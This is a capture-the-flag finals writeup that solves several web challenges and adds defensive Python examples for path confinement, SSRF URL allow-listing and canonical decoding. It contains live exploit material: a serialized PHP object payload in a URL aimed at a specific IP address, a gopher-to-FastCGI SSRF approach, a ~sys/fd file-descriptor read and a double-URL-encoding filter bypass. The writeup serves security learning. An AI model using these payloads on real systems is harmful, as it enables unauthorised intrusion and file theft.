强国杯 (QiangGuo Cup) Finals Writeup

Posted on 2022-12-26, 2 min read

Author: 没队伍一人康康题

c0ol P@th

[screenshot: image-20221224104947058]

expanduser() turns a leading ~ into the corresponding user's home directory, taken from /etc/passwd. With ~sys the path therefore becomes /dev/.

[screenshot: image-20221224105108348]

The flag file happens to have been open()ed and never close()d, so a file descriptor is left behind. Brute-force the descriptor number: ~sys/fd/6.
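The root cause above is that user input reached os.path.expanduser(), which consults the passwd database for any ~name prefix, so the "base directory" the application thought it was serving from was never enforced. The following is an added example (not code from the challenge or the writeup) of how a defender would confine a user-supplied path: refuse ~ expansions outright and check the normalised result against an assumed application directory, BASE_DIR = /srv/app/files.

```python
import os
from pathlib import Path
from typing import Optional

# Assumed application directory that user-supplied relative paths must stay inside.
BASE_DIR = Path("/srv/app/files")


def expanduser_target(user_input: str) -> str:
    """What os.path.expanduser() would actually open for this input.

    A leading '~name' is looked up in the passwd database, so the result depends
    on the host's /etc/passwd (e.g. '~sys' -> '/dev' on Debian-family systems,
    as in the challenge) rather than on the application directory.
    """
    return os.path.expanduser(user_input)


def resolve_user_path(user_input: str, base: Path = BASE_DIR) -> Optional[Path]:
    """Return an absolute path confined to `base`, or None if the input is unsafe.

    Rejects: '~' expansions (never passed to expanduser), NUL bytes, absolute
    paths, and any '..' sequence that escapes `base` after normalisation.
    """
    if user_input.startswith("~"):
        return None
    if "\x00" in user_input:
        return None
    root = base.resolve(strict=False)
    # An absolute user_input replaces `root` here, which the relative_to check catches.
    candidate = (root / user_input).resolve(strict=False)
    try:
        candidate.relative_to(root)
    except ValueError:
        return None
    return candidate


if __name__ == "__main__":
    for sample in ("reports/a.txt", "../../../etc/passwd", "~sys/fd/6", "/etc/passwd"):
        print(repr(sample), "->", resolve_user_path(sample))
```

resolve() normalises the '..' components before the containment check, so 'reports/../b.txt' is accepted as /srv/app/files/b.txt while anything that lands outside the root is dropped; the check is done on the resolved path so symlinks inside the directory cannot be used to point elsewhere.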

32 plus 32

Hex, then base64, then unzip.

pop1

<?php
// Challenge class as given. cflag() is the sink: with $pass truthy it runs `cat /flag`.
class kaka
{
    public $pass = true;
    public $name = '1';
    public $age = '1';

    public function cflag()
    {
        if ($this->pass) {
            eval(system('cat /flag'));
        } else {
            echo "no word, flag";
        }
    }

    public function cname($n, $a)
    {
        if ($this->name === $n) {
            if ($this->age === $a) {
                return true;
            }
        }
    }
}

// Serialise an instance with the default properties ($pass = true) to get the payload.
$data = serialize(new kaka());
echo $data;
http://39.107.127.105:50906/?pop=O:4:%22kaka%22:3:{s:4:%22pass%22;b:1;s:4:%22name%22;s:1:%221%22;s:3:%22age%22;s:1:%221%22;}&name=lilei&age=two

ezxunrui

Look for the changelog.

[screenshot: image-20221224121932593]

Search the whole code base for dr_catcher_data.

[screenshot: image-20221224122001362]
[screenshot: image-20221224122012986]

The parameter is user-controllable and reaches the SSRF. nginx usually talks to PHP over FastCGI, so go for a gopher SSRF.

[screenshot: image-20221224122052997]

First run ls | base64 -w0 once, which reveals /readflag; then read the flag.

[screenshot: image-20221224122132789]
http://39.106.156.96:46243/index.php?s=api&c=api&m=qrcode&thumb=gopher payload&text=123&level=1&size=1
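The thumb parameter above is a URL the server fetches on the user's behalf, and nothing restricted the scheme, so gopher:// could carry a raw FastCGI conversation to the backend. As an added example (not code from the application or the writeup), this is the allow-list check a defender would put in front of such a fetch: only http/https, no userinfo, and every address the host resolves to must be public. The resolver is injectable so the check can be exercised offline; the hostnames and addresses in the `__main__` block and test are constructed.

```python
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def system_resolver(host: str) -> List[str]:
    """Resolve `host` with the OS resolver and return every address as a string."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def ip_is_public(addr: str) -> bool:
    """True only for globally routable unicast addresses."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # unparseable (e.g. zone-scoped IPv6): reject conservatively
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_allowed_fetch_url(url: str,
                         resolve: Callable[[str], List[str]] = system_resolver) -> bool:
    """Allow-list check for a user-supplied URL the server is about to fetch.

    Scheme must be http/https (so gopher://, file://, dict:// never reach the
    HTTP client), no userinfo, and every address the host resolves to must be
    public. Literal hosts go through the resolver too, so shorthand or hex
    forms are judged by the address that would actually be connected to.
    """
    try:
        parts = urlsplit(url)
        _ = parts.port  # raises ValueError for a malformed port
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname
    if not host or parts.username is not None or parts.password is not None:
        return False
    addrs = resolve(host)
    # all([]) is True, so an unresolvable host must be rejected explicitly.
    return bool(addrs) and all(ip_is_public(a) for a in addrs)


if __name__ == "__main__":
    # Constructed resolver table for an offline demonstration.
    table = {"cdn.example.com": ["93.184.216.34"], "localhost": ["127.0.0.1"]}
    demo = lambda h: table.get(h, [])
    for u in ("http://cdn.example.com/a.png", "gopher://127.0.0.1:9000/_x",
              "file:///etc/passwd", "http://localhost/"):
        print(u, "->", is_allowed_fetch_url(u, demo))
```

Two caveats apply in production: connect to the address that was validated rather than resolving the name a second time (otherwise a DNS answer can change between check and use), and treat every HTTP redirect as a fresh URL that must pass the same check.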

Ex1T

Reused challenge; the original:

https://www.ctfiot.com/59624.html

[screenshot: image-20221224134158547]

芝士雪豹

The Java service was started as root... Unintended solution: double URL encoding bypasses the flag keyword filter outright.

[screenshot: image-20221224134248802]
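The filter failed because it inspected the request after one percent-decode while the application decoded the value again before using it, so a second layer of encoding hid the keyword. The following added example (not code from the challenge or the writeup) models that filter and its canonical counterpart, which decodes until the value stops changing before matching, and refuses values that do not stabilise within a bounded number of rounds. The deny-list and the sample requests are constructed for the demonstration.

```python
from urllib.parse import unquote
from typing import List

# Constructed deny-list; the page only says a "flag" keyword filter was in place.
BLOCKED_KEYWORDS = ("flag",)


def single_decode_filter(raw_value: str) -> bool:
    """Model of the filter the page describes: decode once, then keyword-match.

    Returns True when the value is blocked.
    """
    return any(k in unquote(raw_value).lower() for k in BLOCKED_KEYWORDS)


def decode_stages(raw_value: str, max_rounds: int = 4) -> List[str]:
    """Every intermediate form produced by repeated percent-decoding."""
    stages = [raw_value]
    while len(stages) <= max_rounds:
        decoded = unquote(stages[-1])
        if decoded == stages[-1]:
            break
        stages.append(decoded)
    return stages


def canonical_decode(raw_value: str, max_rounds: int = 4) -> str:
    """Percent-decode until stable; reject values still changing after max_rounds."""
    stages = decode_stages(raw_value, max_rounds)
    if unquote(stages[-1]) != stages[-1]:
        raise ValueError("value still changing after %d decode rounds" % max_rounds)
    return stages[-1]


def canonical_filter(raw_value: str) -> bool:
    """Same keyword check, applied to the fully decoded form.

    Values that cannot be canonicalised are blocked rather than passed through.
    """
    try:
        value = canonical_decode(raw_value)
    except ValueError:
        return True
    return any(k in value.lower() for k in BLOCKED_KEYWORDS)


if __name__ == "__main__":
    for sample in ("/read?f=flag", "/read?f=fl%61g", "/read?f=fl%2561g"):
        print(sample, decode_stages(sample),
              "single:", single_decode_filter(sample),
              "canonical:", canonical_filter(sample))
```

The general rule the example illustrates is that a filter must see the value in exactly the form the consuming code will see it; when the number of decode layers is not fixed, canonicalising to a fixed point is the only way to compare like with like. Running the service as a non-root user would additionally have limited what a successful bypass could read.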
